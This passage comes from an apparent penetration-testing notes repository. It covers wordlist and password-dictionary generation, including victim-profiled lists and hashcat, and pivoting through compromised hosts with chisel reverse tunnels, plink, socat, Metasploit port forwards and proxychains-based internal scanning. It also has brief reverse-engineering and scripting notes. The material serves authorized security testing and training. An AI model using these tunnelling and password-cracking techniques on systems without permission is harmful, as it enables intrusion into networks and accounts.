]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b" *.txt > isbn.txt` 162 | 163 | 164 | 165 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 166 | 167 | -------------------------------------------------------------------------------- /os-agnostic/password-cracking/wordlist-manipulation.md: -------------------------------------------------------------------------------- 1 | # Wordlist Manipulation 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | ## Wordlist Manipulation 10 | 11 | ### Password file merge, sort by unique entries: 12 | 13 | Sorts all files in a directory 14 | 15 | ```bash 16 | find . -maxdepth 1 -type f ! -name ".*" -exec cat {} + | sort -u -o $out_file 17 | ``` 18 | 19 | [https://unix.stackexchange.com/questions/365114/efficiently-merge-sort-unique-large-number-of-text-files](https://unix.stackexchange.com/questions/365114/efficiently-merge-sort-unique-large-number-of-text-files) 20 | 21 | ### Remove the space character with sed 22 | 23 | `# sed -i 's/ //g' file.txt` OR `# egrep -v "^[[:space:]]*$" file.txt` 24 | 25 | ### Remove the last space character with sed 26 | 27 | `# sed -i s/.$// file.txt` 28 | 29 | ### Sorting Wordlists by Length 30 | 31 | `# awk '{print length, $0}' rockyou.txt | sort -n | cut -d " " -f2- > rockyou_length-list.txt` 32 | 33 | ### Convert uppercase to lowercase and the opposite 34 | 35 | ``` 36 | # tr [A-Z] [a-z] < file.txt > lower-case.txt 37 | # tr [a-z] [A-Z] < file.txt > upper-case.txt 38 | ``` 39 | 40 | ### Remove blank lines with sed 41 | 42 | ```bash 43 | sed -i '/^$/d' $text_file 44 | ``` 45 | 46 | ### Remove a specific character with sed 47 | 48 | ```bash 49 | sed -i "s/$char//" $text_file 50 | ``` 51 | 52 | ### Delete all instances of a string with sed 53 | 54 | ```bash 55 | cat $text_file | sed -e "s/$string//g" > $out_text_file 56 | ``` 57 | 58 | ### Replace characters with tr 59 | 60 | `# tr '@' '#' < emails.txt` OR `# sed 's/@/#' file.txt` 61 | 62 | ### Print specific columns with awk or cut 63 | 64 | `# awk -F "," '{print $3}' infile.csv > outfile.csv` OR `# cut -d "," -f 3 infile.csv > outfile.csv` 65 | 66 | > **Note:** if you want to isolate all columns after column 3 put a `-` (dash) after the number: `# cut -d "," -f 3- infile.csv > outfile.csv` 67 | 68 | ### Generate Random Passwords with /dev/urandom 69 | 70 | ``` 71 | tr -dc 'a-zA-Z0-9._!@#$%^&*()' < /dev/urandom | fold -w 8 | head -n 500000 > wordlist.txt 72 | tr -dc 'a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=' < /dev/urandom | fold -w 12 | head -n 4 73 | base64 /dev/urandom | tr -d '[^:alnum:]' | cut -c1-10 | head -2 74 | tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 10 | head -n 4 75 | tr -dc 'a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=' < /dev/urandom | fold -w 12 | head -n 4 | grep -i '[!@#$%^&*()_+{}|:<>?=]' 76 | tr -dc '[:print:]' < /dev/urandom | fold -w 10| head -n 10 77 | tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n2 78 | ``` 79 | 80 | ### Remove Parenthesis with tr 81 | 82 | `# tr -d '()' < in_file > out_file` 83 | 84 | ### Generate wordlists from your file names 85 | 86 | `# ls -A | sed 's/regexp/& /g'` 87 | 88 | ### Process text files when cat is unable to handle strange characters 89 | 90 | `# sed 's/([[:alnum:]]*)[[:space:]]*(.)(..*)/12/' *.txt` 91 | 92 | ### Generate length based wordlists with awk 93 | 94 | `# awk 'length == 10' file.txt > 10-length.txt` 95 | 96 | ### Merge two different txt files 97 | 98 | `# paste -d' ' file1.txt file2.txt > new-file.txt` 99 | 100 | ### Faster sorting 101 | 102 | `# export alias sort='sort --parallel= -S G ' && export LC_ALL='C' && cat file.txt | sort -u > new-file.txt` 103 | 104 | ### Mac to unix 105 | 106 | `# tr '\015' '\012' < in_file > out_file` 107 | 108 | ### Dos to Unix 109 | 110 | `# dos2unix file.txt` 111 | 112 | ### Unix to Dos 113 | 114 | `# unix2dos file.txt` 115 | 116 | ### Extract the difference between two files 117 | 118 | `# grep -F -v -f file1.txt -w file2.txt > file3.txt` 119 | 120 | ### Isolate specific line numbers with sed 121 | 122 | `# sed -n '1,100p' test.file > file.out` 123 | 124 | ### Create Wordlists from PDF files 125 | 126 | `# pdftotext file.pdf file.txt` 127 | 128 | ### Find the line number of a string inside a file 129 | 130 | `# awk '{ print NR, $0 }' file.txt | grep "string-to-grep"` 131 | 132 | ## **Create your own Dictionaries** 133 | 134 | Find as much information about the target as you can and generate a custom dictionary. Tools that may help: 135 | 136 | ### Crunch 137 | 138 | Create a wordlist with lengths from 4 to 6 using a specified character set 139 | 140 | ```bash 141 | crunch 4 6 0123456789ABCDEF -o crunch1.txt 142 | ``` 143 | 144 | Create a list of 4 character "words" using the character set mixalpha (inside file charset.lst) 145 | 146 | 
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
147 | 148 | Character set examples: 149 | 150 | ``` 151 | @ Lower case alpha characters 152 | , Upper case alpha characters 153 | % Numeric characters 154 | ^ Special characters including spaces 155 | ``` 156 | 157 | Using this you can make wordlists using custom character sets with shortcuts 158 | 159 | ``` 160 | crunch 6 8 -t ,@@^^%% 161 | ``` 162 | 163 | ### Cewl 164 | 165 | Generate a wordlist based on a target website 166 | 167 | ```bash 168 | cewl example.com -m 5 -w words.txt 169 | ``` 170 | 171 | ### CUPP 172 | 173 | Generate passwords based on your knowledge of the victim (names, significant dates, etc...) 174 | 175 | ``` 176 | python3 cupp.py -h 177 | ``` 178 | 179 | * [https://github.com/Mebus/cupp](https://github.com/Mebus/cupp) 180 | 181 | ### [pydictor](https://github.com/LandGrey/pydictor) 182 | 183 | ## Hashcat 184 | 185 | TODO: add more 186 | 187 | ## Rules 188 | 189 | * TODO: add more 190 | * [https://github.com/NotSoSecure/password\_cracking\_rules/blob/master/OneRuleToRuleThemAll.rule](https://github.com/NotSoSecure/password\_cracking\_rules/blob/master/OneRuleToRuleThemAll.rule) 191 | 192 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 193 | -------------------------------------------------------------------------------- /os-agnostic/pivoting.md: -------------------------------------------------------------------------------- 1 | # Pivoting 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | ## PORT FORWARDING ("port to port") 10 | 11 | ### Using Metasploit 12 | 13 | Target: Most platforms 14 | 15 | If you get a meterpreter session on a dual homed machine, or one with multiple network interfaces. 16 | 17 | ```bash 18 | portfwd add -l 4445 -p 4443 -r 10.1.1.1 19 | # Use -R to make it reverse 20 | ``` 21 | 22 | ### Using PLINK 23 | 24 | Target: Windows 25 | 26 | service ssh start , and transfer `/usr/share/windows-binaries/plink.exe` to the target machine 27 | 28 | ```bash 29 | #On Target: 30 | plink.exe 10.10.10.123 -P 22 -C -N -L 0.0.0.0:4445:10.10.10.123:4443 -l $KALIUSER -pw $PASS 31 | ``` 32 | 33 | ### Using SOCAT 34 | 35 | Target: Linux 36 | 37 | Forward your 8083 to 10.39.0.2:443 38 | 39 | ```bash 40 | ./socat TCP4-LISTEN:8083,fork TCP4:10.39.0.2:443 41 | ``` 42 | 43 | ### Using CHISEL 44 | 45 | Target: Most platforms 46 | 47 | Remote static tunnels "port to port": 48 | 49 | ```bash 50 | #On Kali "reverse proxy listener": 51 | ./chisel server -p 8000 -reverse 52 | 53 | #General command: 54 | ./chisel client $YOUR_IP:$YOUR_CHISEL_SERVER_PORT L/R:[$YOUR_LOCAL_IP]:$TUNNEL_LISTENING_PORT:$TUNNEL_TARGET:$TUNNEL_PORT 55 | ``` 56 | 57 | **Remote tunnels "access IP:PORT you couldn't access before":** 58 | 59 | ```bash 60 | #On Target: 61 | ./chisel client 10.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80 62 | ``` 63 | 64 | **Local tunnels "listen on the target for something, and send it to us":** 65 | 66 | ```bash 67 | #On Target: 68 | ./chisel client 10.1.1.1:8000 9001:127.0.0.1:8003 69 | ``` 70 | 71 | ## Using netsh 72 | 73 | Target: Windows 74 | 75 | ```bash 76 | #Add a port forward 77 | netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80 78 | #Remove it 79 | netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000 80 | ``` 81 | 82 | ## DYNAMIC Port Forwarding ("one port to any") 83 | 84 | * setup proxychains with socks5 on 127.0.0.1:1080 85 | * Or set up socks5 proxy on firefox 86 | * For nmap use -Pn -sT or use tcp scanner in msf 87 | 88 | ### Using Metasploit 89 | 90 | Target: Most platforms 91 | 92 | * If you get a meterpreter session on a dual homed machine, or one with multiple network interfaces. 93 | * Auto route to IP (multi/manage/autoroute) 94 | * Start socks proxy (auxiliary/server/socks4a) 95 | 96 | ### Using PLINK 97 | 98 | Target: Windows 99 | 100 | ```bash 101 | #On Target: 102 | plink.exe 10.10.10.123 -P 22 -C -N -D 1080 -l $KALIUSER -pw $PASS 103 | ``` 104 | 105 | ### Using CHISEL 106 | 107 | Target: Most platforms 108 | 109 | ```bash 110 | #On Kali: 111 | ./chisel server -p 8000 -reverse 112 | 113 | #On Target: 114 | ./chisel client 10.10.10.123:8000 R:8001:127.0.0.1:1080 115 | ./chisel server -p 8001 --socks5 116 | 117 | #On Kali: 118 | ./chisel client 127.0.0.1:8001 socks 119 | ``` 120 | 121 | ## Public key Authentication 122 | 123 | With OpenSSH, the authorized keys are by default configured in `.ssh/authorized_keys` in the user's home directory. Many OpenSSH versions also look for `ssh/authorized_keys2`. 124 | 125 | You are able to [add options to the authorized key file](https://www.ssh.com/academy/ssh/authorized-keys-openssh#format-of-the-authorized-keys-file) 126 | 127 | Example `authorized_keys` file to allow only port forwarding with no shell access 128 | 129 | ```bash 130 | command="echo 'This account is only for port forwarding!'",from="10.10.0.1,10.10.0.2",no-user-rc,no-agent-forwarding,no-X11-forwarding,no-pty ssh-$keyType $publicKey 131 | ``` 132 | 133 | `command="cmd"` - Forces a command to be executed when this key is used for authentication. This is also called command restriction or forced command. The effect is to limit the privileges given to the key, and specifying this options is often important for implementing the principle of least privilege. Without this option, the key grants unlimited access as that user, including obtaining shell access. 134 | 135 | It is a common error when configuring SFTP file transfers to accidentally omit this option and permit shell access. 136 | 137 | `from="pattern-list"` - Specifies a source restriction or from-stanza, restricting the set of IP addresses or host names from which the reverse-mapped DNS names from which the key can be used. 138 | 139 | The patterns may use \* as wildcard, and may specify IP addresses using \* or in CIDR address/masklen notation. Only hosts whose IP address or DNS name matches one of the patterns are allowed to use the key. 140 | 141 | More than one pattern may be specified by separating them by commas. An exclamation mark ! can be used in front of a pattern to negate it. 142 | 143 | `no-pty` - Prevents allocation of a pseudo-tty for connections using the key. 144 | 145 | `no-user-rc` - Disables execution of .ssh/rc when using the key. 146 | 147 | `no-x11-forwarding` - Prevents X11 forwarding. 148 | 149 | ## References 150 | 151 | * [https://notes.benheater.com/books/network-pivoting/page/ssh-port-forwarding](https://notes.benheater.com/books/network-pivoting/page/ssh-port-forwarding) 152 | * [https://iximiuz.com/en/posts/ssh-tunnels/](https://iximiuz.com/en/posts/ssh-tunnels/) 153 | * [https://ironhackers.es/en/cheatsheet/port-forwarding-cheatsheet/](https://ironhackers.es/en/cheatsheet/port-forwarding-cheatsheet/) 154 | * [https://github.com/haad/proxychains](https://github.com/haad/proxychains) 155 | * [https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html](https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html) 156 | * [https://thegreycorner.com/2021/12/15/hackthebox\_dante-review.html](https://thegreycorner.com/2021/12/15/hackthebox\_dante-review.html) 157 | * [https://github.com/t3l3machus/pentest-pivoting](https://github.com/t3l3machus/pentest-pivoting) 158 | * [https://serverfault.com/questions/361794/with-ssh-only-reverse-tunnel-web-access-via-ssh-socks-proxy](https://serverfault.com/questions/361794/with-ssh-only-reverse-tunnel-web-access-via-ssh-socks-proxy) 159 | * [https://www.offensive-security.com/metasploit-unleashed/proxytunnels/](https://www.offensive-security.com/metasploit-unleashed/proxytunnels/) 160 | * [https://www.cobaltstrike.com/blog/howto-port-forwards-through-a-socks-proxy/](https://www.cobaltstrike.com/blog/howto-port-forwards-through-a-socks-proxy/) 161 | * [https://materials.rangeforce.com/tutorial/2020/03/16/Proxychains/](https://materials.rangeforce.com/tutorial/2020/03/16/Proxychains/) 162 | * [https://medium.com/geekculture/forwarding-burp-suite-traffic-through-socks-proxy-bada1124341c](https://medium.com/geekculture/forwarding-burp-suite-traffic-through-socks-proxy-bada1124341c) 163 | -------------------------------------------------------------------------------- /os-agnostic/pivoting/chisel.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: Pivoting using Chisel 3 | --- 4 | 5 | # Chisel 6 | 7 | ## **Requirements** 8 | 9 | Requires a copy of the Chisel binary on both the target and attacker systems. 10 | 11 | ## **Advantages** 12 | 13 | * Chisel is a portable binary that can be run on many operating systems 14 | * Either system can host the chisel server on a chosen TCP port 15 | * Allows for a high amount of flexibility in situations where restrictions on connectivity exist 16 | * No dependencies on SSH daemons/services running on the target 17 | * Supports authenticated proxies to prevent unwanted connections. 18 | 19 | ## **Individual Port Forwarding** 20 | 21 | Example: A service on a compromised host is listening on `$RPORT` 22 | 23 | 1. Run the Chisel server on the target and connect from the attack box 24 | 2. Specify the port forward on the client 25 | 3. Open a port on attack box and forward traffic to remote port 26 | 27 | ```bash 28 | # Target Machine 29 | ./chisel server --port $SERV_PORT 30 | 31 | # Attack Machine 32 | ./chisel client $targetIP:$SERV_PORT $LHOST:$LPORT:$RHOST:$RPORT 33 | ``` 34 | 35 | Open `$LPORT` on attack box and port forward to `$RPORT` on target 36 | 37 | ## **Reverse Individual Port Forwarding** 38 | 39 | Example: A service on a compromised host is listening on `$LPORT` 40 | 41 | 1. Run the Chisel server on the attack box in **reverse mode** and connect from the target 42 | 2. Specify the port forward on the target machine 43 | 3. Open a port on attack box and forward traffic to remote port 44 | 45 | ```bash 46 | # Attack Machine 47 | ./chisel server --reverse --port $SERV_PORT 48 | 49 | # Target Machine 50 | ./chisel client $attackIP:$SERV_PORT R:$RPORT:$LHOST:$LPORT 51 | ``` 52 | 53 | Open `$RPORT` on attack box and forward to `$LPORT` on target through reverse connection. 54 | 55 | ## **Socks Proxy** 56 | 57 | ### **Server Running on Attack Box** 58 | 59 | ```bash 60 | # Attack Machine 61 | ./chisel server --reverse --port 51234 62 | 63 | # Target Machine 64 | ./chisel client $AttackIP:51234 R:127.0.0.1:54321:socks 65 | ``` 66 | 67 | Opens port 54321 on attack box as a reverse SOCKS proxy. Listens for connections from Chisel on this port. 68 | 69 | ### **Chisel Server Running on Target** 70 | 71 | ```bash 72 | # Target Machine 73 | ./chisel server --socks5 --port 51234 74 | 75 | # Attack Machine 76 | ./chisel client $targetIP:51234 54321:socks 77 | ``` 78 | 79 | Open port 54321 on attack machine as a forward SOCKS proxy 80 | 81 | ### **Forward Dynamic SOCKS Proxy** 82 | 83 | 1. Run the Chisel server on the target box 84 | 2. Use the target box as a jump host to reach additional targets routable by the target 85 | 86 | The traffic flows forward to the target box, which acts as a transparent SOCKS proxy 87 | 88 | ```bash 89 | # Target Machine 90 | ./chisel server --socks5 --port $SERV_PORT 91 | 92 | # Attack Machine 93 | ./chisel client $targetIP:$SERV_PORT $LPORT:socks 94 | ``` 95 | 96 | ### **Reverse Dynamic SOCKS Proxy** 97 | 98 | 1. Run the Chisel server on the attack box in reverse mode 99 | 2. Connect to the Chisel server from the target and specify a reverse port forward 100 | 101 | The traffic flows through the port on the attack box in reverse to the target box, which acts as a transparent SOCKS proxy 102 | 103 | ``` 104 | # Attack Machine 105 | ./chisel server --reverse --port $SERV_PORT 106 | 107 | # Target Machine 108 | ./chisel client $attackIP:$SERV_PORT R:127.0.0.1:$LPORT:socks 109 | ``` 110 | 111 | ## **Reverse Shell Tips** 112 | 113 | ### **Run Chisel in the Background** 114 | 115 | Running `chisel` in the foreground in a reverse shell will render your shell useless. Background the process in order to continue to use the shell while forwarding traffic. 116 | 117 | #### **Linux** 118 | 119 | Background a process with '`&`'. Works for both client and server sides. 120 | 121 | ```bash 122 | chisel server --port 8080 --reverse & 123 | ``` 124 | 125 | #### **Windows - PowerShell** 126 | 127 | **Client Side** 128 | 129 | ```powershell 130 | # Use the Start-Job cmdlet with a script block 131 | $background = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('client','10.0.0.2:8080','R:127.0.0.1:8800:127.0.0.1:80') } 132 | Start-Job -ScriptBlock $background 133 | ``` 134 | 135 | **Server Side** 136 | 137 | Note that in `server` mode, you'll need to make sure your port is allowed through the firewall. 138 | 139 | ```powershell 140 | # Use the Start-Job cmdlet with a script block 141 | $background = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('server','--port 50001','--socks5') } 142 | Start-Job -ScriptBlock $background 143 | ``` 144 | 145 | ## References 146 | 147 | * [https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel](https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel) 148 | -------------------------------------------------------------------------------- /os-agnostic/pivoting/plink.exe.md: -------------------------------------------------------------------------------- 1 | # Plink.exe 2 | 3 | Pivoting using Plink.exe 4 | -------------------------------------------------------------------------------- /os-agnostic/pivoting/proxychains.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: Pivoting using Proxychains 3 | --- 4 | 5 | # Proxychains 6 | 7 | ## Requirements 8 | 9 | Requires installing proxychains on the attacker machine. 10 | 11 | ## Advantages 12 | 13 | * advantage 1 14 | * subnote 15 | * advantage 2 16 | 17 | ## References 18 | 19 | * [https://github.com/haad/proxychains](https://github.com/haad/proxychains) 20 | * [https://materials.rangeforce.com/tutorial/2020/03/16/Proxychains/](https://materials.rangeforce.com/tutorial/2020/03/16/Proxychains/) 21 | * [https://github.com/t3l3machus/pentest-pivoting](https://github.com/t3l3machus/pentest-pivoting) 22 | * [https://www.hackwhackandsmack.com/?p=1021](https://www.hackwhackandsmack.com/?p=1021) 23 | 24 | ## To Sort 25 | 26 | * [https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/) 27 | 28 | ### Proxychains Pivot 29 | 30 | ```bash 31 | # When you have access to a machine, you can use it as pivot to target machines 32 | 33 | # Getting known machines 34 | arp -a 35 | 36 | # Setup SSH Dynamic on the attacking box 37 | ssh -D @ 38 | 39 | # Setup proxychains in /etc/proxychains.conf 40 | [ProxyList] 41 | socks5 127.0.0.1 42 | 43 | # Reduce timeout in /etc/proxychains.conf to gain speed 44 | tcp_read_time_out 800 45 | tcp_connect_time-out 800 46 | 47 | # Then 48 | proxychains... 49 | # Scanning (nmap) can be very long through proxychains 50 | # You can speed it up by using xargs and multithreading 51 | # The main goal is to spread ports between different threads (-P 50) 52 | 53 | seq 1 1000 | xargs -P 50 -I{} proxychains -q nmap -p {} -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap --append-output $IP_Address 54 | 55 | # Unfortunately you can't just run -oA but need the --append-output option to get searchable output 56 | # To find out what ports are open: 57 | cat proxychains_nmap | grep -A1 "Status" 58 | 59 | # The same behavior can be used to scan multiple machines 60 | # The base command 61 | proxychains nmap -sT -T4 --top-ports 20 -oG 10.42.42.0 --open 10.42.42.0/24 62 | 63 | # The final combination. These two could potentially be combined to port scan multiple hosts but is not recommended 64 | seq 1 254 | xargs -P 50 -I{} proxychains nmap --top-ports 20 -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap --append-output 192.168.1.{} 65 | ``` 66 | 67 | ### Double Pivot Proxychains 68 | 69 | ```bash 70 | # Pivot 1 using proxychains 71 | ssh -D 1080 user@IP_Network1 72 | 73 | # Configure /etc/proxychains to set port 1080 74 | # Pivot 2 using proxychains 75 | proxychains ssh -D 1081 user@IP_Network2 76 | 77 | # Configure /etc/proxychains to set port 1081 78 | 79 | proxychains nmap... 80 | ``` 81 | 82 | ## Proxychains configuration 83 | 84 | ProxyChains looks for the configuration file in the following order: 85 | 86 | 1. SOCKS5 proxy port in environment variable `${PROXYCHAINS_SOCKS5}` 87 | 2. File listed in environment variable `${PROXYCHAINS_CONF_FILE}` 88 | 3. The `-f configfile_name` argument provided to the proxychains command 89 | 4. `./proxychains.conf` 90 | 5. `$(HOME_DIRECTORY)/.proxychains/proxychains.conf` 91 | 6. `/etc/proxychains.conf` 92 | 93 | ### Specify proxy on command line 94 | 95 | Using number 1 from above, you can see there is no need to exit the config file every time! 96 | 97 | ```bash 98 | ssh -fN -D 4321 $user@$target 99 | PROXYCHAINS_SOCKS5=4321 proxychains zsh 100 | ``` 101 | -------------------------------------------------------------------------------- /os-agnostic/pivoting/socat.md: -------------------------------------------------------------------------------- 1 | # Socat 2 | 3 | Pivoting using Socat 4 | -------------------------------------------------------------------------------- /os-agnostic/pivoting/sshuttle.md: -------------------------------------------------------------------------------- 1 | # Sshuttle 2 | 3 | Pivoting using Sshuttle 4 | -------------------------------------------------------------------------------- /os-agnostic/reverse-engineering-and-binary-exploitation.md: -------------------------------------------------------------------------------- 1 | # Reverse Engineering & Binary Exploitation 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | ## Binary Exploitation / Reverse Engineering 10 | 11 | [Ghidra](https://ghidra-sre.org/)! 12 | 13 | gdb plugin for exploits/creates patterns for ROP determination: peda.py/pwndbg \[gdb: pattern create \#\#\#\] 14 | 15 | ASLR Bypass/binary exploit/gdb: 16 | 17 | * [Ippsec:HackTheBox - October](https://www.youtube.com/watch?v=K05mJazHhF4) 18 | * [Ippsec:Camp CTF - Bitterman](https://www.youtube.com/watch?v=6S4A2nhHdWg) 19 | * [pwnTools](https://github.com/Gallopsled/pwntools) - [documentation](http://docs.pwntools.com/en/stable/) 20 | * [Binary Ninja](https://binary.ninja/) 21 | 22 | [Packetstorm](https://packetstormsecurity.com/) /bin/sh shellcode 23 | 24 | simple binary exploitation [Ippsec:HacktheBox - Sneaky](https://www.youtube.com/watch?v=1UGxjqTnuyo) 25 | 26 | [protostar ctf](https://exploit-exercises.com/protostar/) for getting into binary exploitation 27 | 28 | Find the location of a specific string to manipulate and its bit offset in an executable:`strings -t d | grep ` 29 | 30 | -------------------------------------------------------------------------------- /os-agnostic/reverse-engineering-and-binary-exploitation/README.md: -------------------------------------------------------------------------------- 1 | # Reverse Engineering & Binary Exploitation 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | {% hint style="danger" %} 10 | Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes). 11 | {% endhint %} 12 | 13 | [Ghidra](https://ghidra-sre.org/)! 14 | 15 | {% embed url="https://ghidra-sre.org/" %} 16 | 17 | * [https://github.com/onethawt/reverseengineering-reading-list](https://github.com/onethawt/reverseengineering-reading-list) - Reverse engineering reading list 18 | * [http://shell-storm.org/online/Online-Assembler-and-Disassembler/](http://shell-storm.org/online/Online-Assembler-and-Disassembler/) 19 | * [https://www.filesignatures.net/index.php?page=all](https://www.filesignatures.net/index.php?page=all) - File signatures for just about any file type 20 | 21 | gdb plugin for exploits/creates patterns for ROP determination: `peda.py`/`pwndbg` \[gdb: pattern create ###] 22 | 23 | ASLR Bypass/binary exploit/gdb: 24 | 25 | * [Ippsec:HackTheBox - October](https://www.youtube.com/watch?v=K05mJazHhF4) 26 | * [Ippsec:Camp CTF - Bitterman](https://www.youtube.com/watch?v=6S4A2nhHdWg) 27 | * [pwnTools](https://github.com/Gallopsled/pwntools) - [documentation](http://docs.pwntools.com/en/stable/) 28 | * [Binary Ninja](https://binary.ninja/) 29 | 30 | [Packetstorm](https://packetstormsecurity.com/) /bin/sh shellcode 31 | 32 | simple binary exploitation [Ippsec:HacktheBox - Sneaky](https://www.youtube.com/watch?v=1UGxjqTnuyo) 33 | 34 | [protostar ctf](https://exploit-exercises.com/protostar/) for getting into binary exploitation 35 | 36 | Find the location of a specific string to manipulate and its bit offset in an executable:`strings -t d | grep ` 37 | 38 | 39 | 40 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 41 | -------------------------------------------------------------------------------- /os-agnostic/reverse-engineering-and-binary-exploitation/buffer-overflow.md: -------------------------------------------------------------------------------- 1 | # Buffer Overflow 2 | 3 | {% hint style="danger" %} 4 | Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes). 5 | {% endhint %} 6 | 7 | ## Buffer Overflow-specific resources: 8 | 9 | * [https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/](https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/) 10 | * [https://github.com/justinsteven/dostackbufferoverflowgood](https://github.com/justinsteven/dostackbufferoverflowgood) 11 | 12 | ## **Steps :** 13 | 14 | 1. Fuzzing 15 | 2. Finding the Offset 16 | 3. Overwriting the EIP 17 | 4. Finding Bad Characters 18 | 5. Finding the JMP ESP address 19 | 6. Exploiting the System 20 | 21 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 22 | -------------------------------------------------------------------------------- /os-agnostic/scripting.md: -------------------------------------------------------------------------------- 1 | # Scripting 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | TODO: Create separate pages for each scripting language (issue [#19](https://github.com/zweilosec/Infosec-Notes/issues/19)) 10 | * Create separate pages for each scripting language (bash, python, etc.) 11 | * Add basic information about each language, similar to PowerShell page 12 | 13 | ## Bash 14 | 15 | ### Check for root privileges 16 | 17 | When user account created a user ID is assigned to each user. BASH shell stores the user ID in the $UID environment variable. The effective user ID is stored in the $EUID variable. 18 | 19 | You can easily add a simple check at the start of a script to make sure it is being run with root privileges. 20 | 21 | #### Old way to check for root privileges 22 | 23 | ```text 24 | #!/bin/bash 25 | 26 | # Make sure only the root user can run the script 27 | # Or it is run with sudo 28 | if [ "$(id -u)" != "0" ]; then 29 | echo "This script must be run as root." 1>&2 30 | exit 1 31 | fi 32 | ``` 33 | 34 | #### New way: Using EUID 35 | 36 | ```text 37 | #!/bin/bash 38 | 39 | # Make sure only the root user can run our script 40 | # Or it is run with sudo 41 | if [[ $EUID -ne 0 ]]; then 42 | echo "This script must be run as root." 1>&2 43 | exit 1 44 | fi 45 | ``` 46 | 47 | ### MISC 48 | 49 | [https://www.techbrown.com/most-useful-bash-scripts-linux-sysadmin/](https://www.techbrown.com/most-useful-bash-scripts-linux-sysadmin/) 50 | 51 | ```text 52 | wget https://raw.githubusercontent.com/sathisharthar/Admin-Scripts/master/sysinop 53 | ``` 54 | 55 | Add to `multitool.sh`:create wordlists with cewl & Hashcat; add add options to use mangling rules; 56 | 57 | Add to `multitool.sh`: crack passwords with Hashcat 58 | 59 | ```text 60 | #crack passwords with hashcat; 61 | 62 | #get user input for attack type - make attack type listing with numeric selections; 63 | 64 | #get user input for hash type 65 | 66 | hashcat --help | grep -i $hash_selection 67 | #|>then prompt user to input the hash type # identifier; 68 | 69 | #Get user input for file with hashes to crack 70 | #|>Check if hashlist includes usernames (in format username:hash) 71 | #|>if so add --username to hashcat syntax 72 | 73 | #Get user input for password list to use for cracking 74 | 75 | #Ask user if they want to apply any mangling rules or a mask 76 | #|>if mask is chosen display a short help screen of default mask types 77 | #|>as well as describe -1 and -2 user masks 78 | #|>make sure character escapes work properly and don't cause problems below 79 | 80 | echo '\?l = abcdefghijklmnopqrstuvwxyz' 81 | echo '\?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ' 82 | echo '\?d = 0123456789' 83 | echo '\?s = \!\"\#\$\%\&\'\(\)\*\+\,\-\.\/\:\;\<\=\>\?\@\[\]\^\_\`\{\|\}\~' 84 | echo '\?a = \?l\?u\?d\?s' 85 | echo '\?b = 0x00 - 0xff' 86 | 87 | #basic execution syntax: 88 | hashcat -D1,2 -O --force -a $attack_type -m $hash_id $hash_list $pass_list 89 | 90 | #find out if hashcat has problems with blank variables 91 | #|>if not then add variables for the proper flags + user input for mangling/masks 92 | #|>ex: rules="-r $user_rules" 93 | ``` 94 | 95 | 96 | 97 | ## Python 98 | 99 | ### Dealing with Sockets 100 | 101 | [https://pequalsnp-team.github.io/cheatsheet/socket-basics-py-js-rb](https://pequalsnp-team.github.io/cheatsheet/socket-basics-py-js-rb) 102 | 103 | ### MISC 104 | 105 | ```text 106 | #checks the output from crypto and sees if at least 60% is ascii letters and returns true for possible plaintext 107 | def is_plaintext(ptext): 108 | num_letters = sum(map(lambda x : 1 if x in string.ascii_letters else 0, ptext)) 109 | if num_letters / len(ptext) >= .6: 110 | return True 111 | ``` 112 | 113 | -------------------------------------------------------------------------------- /os-agnostic/scripting/README.md: -------------------------------------------------------------------------------- 1 | # Scripting 2 | 3 | {% hint 